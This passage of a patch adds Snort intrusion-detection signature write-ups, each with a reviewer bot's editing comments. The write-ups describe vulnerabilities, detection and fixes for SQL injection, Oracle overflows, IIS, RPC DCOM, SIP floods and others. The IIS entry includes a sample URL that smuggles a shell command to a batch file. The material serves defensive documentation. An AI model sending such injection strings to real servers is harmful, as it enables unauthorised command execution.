+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Professional Home Page Tools
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
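Review bot: the second paragraph of Detailed Information is a comma splice ("...compromise the database backend for the application, the attacker may also be able to...") and should be two sentences; the third paragraph is the generic credential-validation boilerplate, which does not describe SQL injection via the "text" parameter of "class.php". Corrective Action only says to apply patches; for an injection issue the entry should also tell the operator to have the application validate input and use parameterised queries, since that is what closes the class of bug rather than one instance. Also "ona web server", and the missing blank lines before the "--" separators after the Sid value, Affected Systems and Contributors.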
--- /dev/null
+++ b/doc/signatures/2627.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2627
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "repcat_import_check" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in some parameters for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gowner" or "gname"
+variable to cause the overflow. The result could permit the
+attacker to gain escalated privileges and run code of their
+choosing. This attack requires an attacker to logon to the
+database with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck90.html
+
+--
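Review bot: Summary reads "a Oracle database implementation"; "an Oracle". As in the companion Oracle entry, Attack Scenarios notes that the attack "requires an attacker to logon to the database with a valid username and password combination" while Ease of Attack just says "Simple."; state the authentication prerequisite there too. The Affected Systems indentation (eight spaces) again differs from the rest of the patch.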
--- /dev/null
+++ b/doc/signatures/265.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+265
+
+--
+Summary:
+This event is generated when spurious DNS traffic is detected on the network. 
+
+--
+Impact:
+Ranges from harmless to severe.  A successful corrupted DNS IP and name pairing can range from harmless (if the IP is not used) to severe (if a user is misdirected to a hostile host).
+
+--
+Detailed Information:
+This event indicates that abnormal DNS traffic has been detected. The implications are varied and careful investigation of the source and destination should be undertaken.
+
+This may be the result of an improperly configured DNS server or it may be an indication that an attack against the DNS server is underway.
+
+--
+Affected Systems:
+Any DNS server.
+
+--
+Attack Scenarios:
+An attacker can spoof a DNS response to misrepresent an IP to host/name pairing.  The forged host name can direct a user to a potentially hostile host.
+
+--
+Ease of Attack:
+Simple to Difficult depending on the DNS implementation.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Consider using DNSSEC where appropriate.
+
+Keep all DNS software up to date and correctly configured.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
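Review bot: Summary ("spurious DNS traffic") and Detailed Information ("abnormal DNS traffic") never say what characteristic of the traffic triggers the event, so an analyst cannot judge the False Positives claim of "None Known"; state what the rule matches. Attack Scenarios describes response spoofing, but Detailed Information also allows "an improperly configured DNS server", which is a false-positive source and belongs under False Positives. Minor: "None Known" is capitalised differently from the "None known." used elsewhere, and Additional References is empty with a stray blank line.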
--- /dev/null
+++ b/doc/signatures/100000158.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+100000158
+
+-- 
+Summary: 
+This event is generated when an abnormally larger number of SIP INVITE messages 
+is received in a short time frame.
+
+--
+Impact:
+This can be an indication of a denial of service attack in progress, or simply 
+a poorly configured or implemented user agent.
+
+--
+Detailed Information:
+This rule is used to detect overly large numbers of SIP INVITE messages coming 
+into hosts on an internal network, which may indicate a denial of service 
+attack in progress. Since this traffic could also be the result of a poorly 
+configured user agent, or simply a very busy SIP proxy, careful analysis of 
+both the hosts receiving and sending this traffic is required before 
+determining that an attack has actually taken place.
+
+--
+Affected Systems:
+Any which implement the SIP protocol.
+
+--
+Attack Scenarios:
+An attacker could use a script to flood a system with INVITE messages, causing 
+a denial of service.
+
+--
+Ease of Attack:
+Simple, as SIP is a public, well-documented protocol.
+
+--
+False Positives:
+Known SIP proxies may receive a high volume of legitimate INVITE requests, and 
+NAT devices may appear to be sending a larger number of INVITE requests than a 
+regular host. It is recommended that users whitelist known SIP proxies and NAT 
+devices.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a firewall or other access-restriction device to block unwanted messages at 
+your network's border.
+
+--
+Contributors:
+Jiri Markl <jiri.markl@nextsoft.cz>
+Sourcefire Research Team
+
+--
+Additional References
+Other:
+
+--
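Review bot: "an abnormally larger number of SIP INVITE messages" in Summary should be "an abnormally large number". The "Additional References" heading is missing its colon and the "Other:" entry beneath it is empty; either cite the SIP RFC the Ease of Attack section alludes to ("SIP is a public, well-documented protocol") or remove the empty entry. Corrective Action ("block unwanted messages at your network's border") is weak for a flood against a proxy that must accept INVITEs from the Internet; suggest rate limiting on the proxy as well. Trailing whitespace on "Rule: ", "Sid: ", "-- " and "Summary: ".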
--- /dev/null
+++ b/doc/signatures/3120.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3120
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
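Review bot: there is a stray blank line between the "--" separator and "Corrective Action:", which breaks the section layout every other file follows. Affected Systems lists "Microsoft Windows Server 2000", which is not a product name (the product is Windows 2000 Server), and Additional References is empty although Corrective Action tells the reader to "Apply the appropriate vendor supplied patches", so the Microsoft bulletin should be cited. Several header lines ("Rule: ", "Sid: ", "-- ", "Impact: ") carry trailing whitespace.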
--- /dev/null
+++ b/doc/signatures/2037.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2037
+
+--
+Summary:
+Network Status Monitor (NSM) is used to indicate wether a host is up or 
+for its status.
+
+--
+Impact:
+Intelligence gathering about the current state of a host and wether rpc 
+services are available.
+
+--
+Detailed Information:
+NSM runs on client machines and informs other hosts of the status of 
+that machine should a crash or reboot occur. Each remote application 
+using an rpc service can therefore register with the host when services 
+are once again available.
+
+A request made to a machine will indicate to the attacker the status of 
+that host and will also be indicative of rpc services being available. 
+The attacker might then continue to ascertain which rpc services are 
+being offered and then launch an attack on vulnerable daemons.
+
+--
+Affected Systems:
+Any system running the service.
+
+--
+Attack Scenarios:
+An attacker merely needs to request the status of the host using rpc.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+Use the hosts.allow file to restrict the hosts able to request the 
+status of the server.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Network Status Monitor Protocol, The Open Group:
+http://www.opengroup.org/onlinepubs/009629799/chap11.htm
+
+--
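Review bot: "wether" appears in both Summary and Impact; "whether". The Summary describes what NSM is rather than when the event is generated ("This event is generated when a request for the status of a host is made via the NSM RPC service"), which is the convention every other entry follows. "rpc" is lower-case in the body but "RPC" in Corrective Action; pick one. The hosts.allow advice only applies where the status daemon is built with TCP wrapper support, which is worth saying.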
--- /dev/null
+++ b/doc/signatures/100000159.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+100000159
+
+-- 
+Summary: 
+This event is generated when an abnormally larger number of SIP REGISTER 
+messages is received in a short time frame.
+
+--
+Impact:
+This can be an indication of a denial of service attack in progress, or simply 
+a poorly configured or implemented user agent.
+
+--
+Detailed Information:
+This rule is used to detect overly large numbers of SIP REGISTER messages 
+coming into hosts on an internal network, which may indicate a denial of 
+service attack in progress. Since this traffic could also be the result of 
+a poorly configured user agent, or simply a very busy SIP proxy, careful 
+analysis of both the hosts receiving and sending this traffic is required 
+before determining that an attack has actually taken place.
+
+--
+Affected Systems:
+Any which implement the SIP protocol.
+
+--
+Attack Scenarios:
+An attacker could use a script to flood a system with REGISTER messages, 
+causing a denial of service.
+
+--
+Ease of Attack:
+Simple, as SIP is a public, well-documented protocol.
+
+--
+False Positives:
+Known SIP proxies may receive a high volume of legitimate REGISTER requests, 
+and NAT devices may appear to be sending a larger number of REGISTER requests 
+than a regular host. It is recommended that users whitelist known SIP proxies 
+and NAT devices.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Use a firewall or other access-restriction device to block unwanted messages at 
+your network's border.
+
+--
+Contributors:
+Jiri Markl <jiri.markl@nextsoft.cz>
+Sourcefire Research Team
+
+--
+Additional References
+Other:
+
+--
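Review bot: same issues as the INVITE entry: "abnormally larger number" should be "abnormally large number", "Additional References" lacks its colon and has an empty "Other:" entry, and Corrective Action should mention rate limiting on the SIP proxy in addition to border filtering, since legitimate REGISTER traffic has to be admitted. Trailing whitespace on the header lines.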
--- /dev/null
+++ b/doc/signatures/683.txt
@@ -0,0 +1,76 @@
+Rule:  
+
+--
+Sid: 
+683
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft MSDN:
+http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_sp_pa-pz_5x44.asp
+
+--
--- /dev/null
+++ b/doc/signatures/2127.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+2127
+
+--
+Summary:
+This event is generated when an attempt is made to access ikonboard.cgi
+on a web server. This may indicate an attempt to exploit an arbitrary 
+code execution vulnerability that affects Ikonboard web-based bulletin 
+board software.
+
+--
+Impact:
+Arbitrary code execution.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit an 
+arbitrary code execution vulnerability in Ikonboard web-based bulletin 
+board software. An attacker can bypass user input validation by 
+inserting illegal characters into the "lang" value of a user cookie, 
+which then allows the attacker to pass arbitrary Perl code to the web 
+server.
+
+--
+Affected Systems:
+Any web server running Ikonboard bulletin board software.
+
+--
+Attack Scenarios:
+An attacker can provide a crafted cookie to the web server running 
+Ikonboard. The web server will then attempt to execute the arbitrary 
+Perl commands embedded in the cookie.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses ikonboard.cgi, this rule may 
+generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+An unsupported and unofficial patch is available at http://www.securityfocus.com/bid/7361/solution/.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7361
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11605
+
+--
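Review bot: Corrective Action offers only "An unsupported and unofficial patch" from a third party; lead with upgrading to a vendor-fixed Ikonboard release and keep the unofficial patch as a fallback, otherwise operators are being pointed at unsupported code as the primary fix. Minor: the reference headings "Bugtraq" and "Nessus" lack the colon used in the other files ("CVE", "Other:", "Bugtraq:"), and Detailed Information could say which field of the cookie ("lang") the rule inspects so the False Positives note about legitimate users is actionable.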
--- /dev/null
+++ b/doc/signatures/405.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+405
+
+--
+
+Summary:
+This event is generated when An ICMP Source Host Isolated datagram is detected on the network.  
+
+--
+
+Impact:
+This is an indication of improperly configured routing equipment or network host.  RFC 1812 indicates that ICMP Type 3 ICMP Code 8 messages should never be generated.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network. Routers should never generate ICMP Type 11 Code 8 as they are in violation of RFC1812.   Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
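Review bot: Impact says "ICMP Type 3 ICMP Code 8" but Detailed Information says "ICMP Type 11 Code 8"; Source Host Isolated is Destination Unreachable (Type 3) Code 8, so the Detailed Information line is wrong and the two sections must agree. Same paragraph: "could indication routing problems" should be "could indicate", and "This rule detects informational network information" in Corrective Action is redundant. Summary capitalises "An ICMP" mid-sentence, "RFC 1812" and "RFC1812" are spelled two ways, and there is no Affected Systems section.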
--- /dev/null
+++ b/doc/signatures/3058.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+3058
+
+--
+Summary:
+This event is generated when a remote user sends an overly long string 
+to an IMAP server via the command COPY. This may indicate an attempt to 
+exploit a buffer overflow condition.
+
+--
+Impact:
+Serious. Possible remote execution of arbitrary code, which may lead to
+a remote root compromise.
+
+--
+Detailed Information:
+When a large amount of data is sent to a vulnerable IMAP server in the 
+COPY command, a buffer overflow condition may occur. This can allow the
+attacker to execute arbitrary code, which may allow the attacker to gain
+root access to the compromised server.
+
+The attacker must use a valid IMAP account to exploit this condition.
+
+--
+Affected Systems:
+	IMAP servers
+
+--
+Attack Scenarios:
+An attacker can send a sufficiently long COPY command to the IMAP
+server, creating a buffer overflow condition. This can then allow the
+attacker to execute code of their choosing and possibly gain root access
+to the compromised server.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate patches for your operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
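Review bot: Affected Systems just says "IMAP servers"; every IMAP server is not vulnerable to an overflow in COPY, so name the implementations and versions, or state that it is unknown. Detailed Information says "The attacker must use a valid IMAP account to exploit this condition." yet Ease of Attack reads "Simple. Exploits exist." with no mention of the credential requirement. Additional References is empty despite "Exploits exist".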
--- /dev/null
+++ b/doc/signatures/2743.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2743
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_site_priority_site
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
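Review bot: the last paragraph of Detailed Information is broken across lines so that it reads "alter_site_priority_site\n. This procedure is included in\ndbms_repcat." with the full stop starting a line; join it into one sentence. Affected Systems has "Oracle Oracle9i" (duplicated word). Corrective Action "Apply the appropriate vendor supplied patch" lacks a full stop, and Additional References is empty for a vulnerability that Impact rates "Serious".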
--- /dev/null
+++ b/doc/signatures/1020.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1020
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow associated with a file with a .idc extension. 
+
+--
+Impact:
+Remote access.  This attack may permit the execution of arbitrary commands on the vulnerable server.
+
+--
+Detailed Information:
+Microsoft Internet Information Service (IIS) supports file extensions including .idc that call the ISM.DLL.  A buffer overflow vulnerability exists in ISM.DLL code when it receives a malformed request, permitting the execution of arbitrary code.  
+
+--
+Affected Systems:
+IIS 4.0 hosts
+
+--
+Attack Scenarios:
+An attacker can send a malformed request containing a file name with an extension of .idc, possibly causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.  Exploit code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to a more current version of IIS.
+ 
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0874
+
+Bugtraq:
+http://www.securityfocus.com/bid/307
+
+
+--
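Review bot: the reference is cited with the retired candidate prefix ("CAN-1999-0874"); it should be written as CVE-1999-0874, the URL still resolves either way. Heading style is inconsistent inside the same section ("CVE" without a colon, "Bugtraq:" with one). Corrective Action "Upgrade to a more current version of IIS." should also mention the vendor patch, since the Affected Systems entry pins it to IIS 4.0 hosts.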
--- /dev/null
+++ b/doc/signatures/3193.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+3193
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Internet Information Server.
+
+--
+Impact:
+Serious. Code execution leading to unauthorized administrative access
+on the target host.
+
+--
+Detailed Information:
+Microsoft IIS contains a programming error that may allow an attacker to
+execute commands of their choosing on a vulnerable system. If a valid
+request for an executable file on the system is made, the server will
+honor the request and execute any commands sent to the system. It may be
+possible for an attacker to execute system commands sent to cmd.exe or
+an executable batch file (.bat) for example.
+
+--
+Affected Systems:
+	Microsoft IIS 4.0
+	Microsoft IIS 5.0
+
+--
+Attack Scenarios:
+An attacker can send a request to an executable file on the system and
+supply command arguments of their choice to the file. The server will
+honor the request and execute the attackers commands.
+
+For example, http://www.target.com/scripts/cmd.bat"+&+somecommand
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
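Review bot: the example URL in Attack Scenarios uses www.target.com, a real domain; use a reserved name such as example.com for illustrative URLs. "execute the attackers commands" should be "attacker's commands". The Summary calls the product "Microsoft Internet Information Server" while the IIS entry for sid 1020 says "Service"; use one name. Additional References is empty.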
--- /dev/null
+++ b/doc/signatures/2009.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2009
+
+--
+Summary:
+CVS is the Concurrent Versions System, commonly used to 
+help manage software development.
+
+--
+Impact:
+This may be an intelligence gathering activity or an attempt to connect 
+to a CVS repository containing code not publicly available.
+
+--
+Detailed Information:
+This rule detects attempts to connect to a CVS repository that fail due 
+indicate determined activity by an attacker to gain unauthorized access 
+to the CVS respository.
+
+The source code of software in the repository may be compromised by a 
+succesful attacker who could gain access to source code not intended for
+public viewing.
+
+For CVS daemons running under changed root conditions (chroot), the rest
+of the operating system files may be protected.
+
+--
+Affected Systems:
+	All versions of CVS
+	
+--
+Attack Scenarios:
+This may be an intelligence gathering activity or an attempt to log in 
+to a CVS repository that is not intended to be publicly available.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+It is possible that an authorized user may mis-type the repository name.
+
+--
+False Negatives:
+Connections to the server using zlib compression will not generate this
+event.
+
+--
+Corrective Action:
+Disable the CVS daemon in the file /etc/inetd.conf. Run the CVS daemon 
+as a user other than root that does not have a valid login to the 
+machine.
+
+Disable anonymous access to the cvs server where appropriate.
+
+Maintain checks on the password database and the CVS repository logs.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVS:
+http://www.cvshome.org/docs/
+
+--
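Review bot: the first sentence of Detailed Information is garbled ("...attempts to connect to a CVS repository that fail due indicate determined activity by an attacker...") and needs rewriting, e.g. "This rule detects attempts to connect to a CVS repository that fail because the repository does not exist; repeated failures may indicate...". Corrective Action is self-contradictory: it says "Disable the CVS daemon in the file /etc/inetd.conf" and then "Run the CVS daemon as a user other than root"; make clear the first applies where the daemon is not needed and the second where it is. Typos: "respository", "succesful". Summary describes CVS instead of stating when the event is generated, and the False Negatives note about zlib compression is useful and should stay.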
--- /dev/null
+++ b/doc/signatures/100000332.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000332
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Artmedic Newsletter" application running on a webserver. Access to the file "log.php" using a remote file being passed as the "email" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "email" parameter in the "log.php" script used by the "Artmedic Newsletter" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Artmedic Newsletter
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
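Review bot: the third paragraph of Detailed Information and the whole Attack Scenarios section describe a credential-validation weakness ("An attacker can access an authentication mechanism and supply his/her own credentials to gain access.") which does not match the remote file include the Summary describes; for an RFI the scenario is a URL to an attacker-hosted script passed in the "email" parameter of "log.php", which the server then fetches and executes, and the text should say so. The Summary reads "an exploitation attempt has been attempted" (drop one "attempt") and the boilerplate has "ona web server". Corrective Action lists only patching; for a PHP remote include the configuration-level mitigation (allow_url_fopen / allow_url_include set to Off) belongs there too. Additional References is empty although Ease of Attack asserts "Exploits exist."; cite the advisory that claim rests on.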
--- /dev/null
+++ b/doc/signatures/3164.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3164
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
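Review bot: the Summary and Detailed Information never say which RPC DCOM vulnerability, interface or request this rule matches, and the identical text appears in the 3169 and 3249 files in this patch, so an analyst who sees SID 3164 has no way to tell what distinguishes it; each file should name the specific flaw (vendor bulletin or CVE) and the traffic pattern the rule keys on. The Attack Scenarios line "An attacker may make a request for a file with an overly long filename via a network share." is one instance and should be tied back to the malformed RPC request described in the paragraph above it rather than to a share. Additional References is empty; add the bulletin. Typo in Ease of Attack: "Expoit code exists."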
--- /dev/null
+++ b/doc/signatures/2811.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2811
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure validate_flavor_definition
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
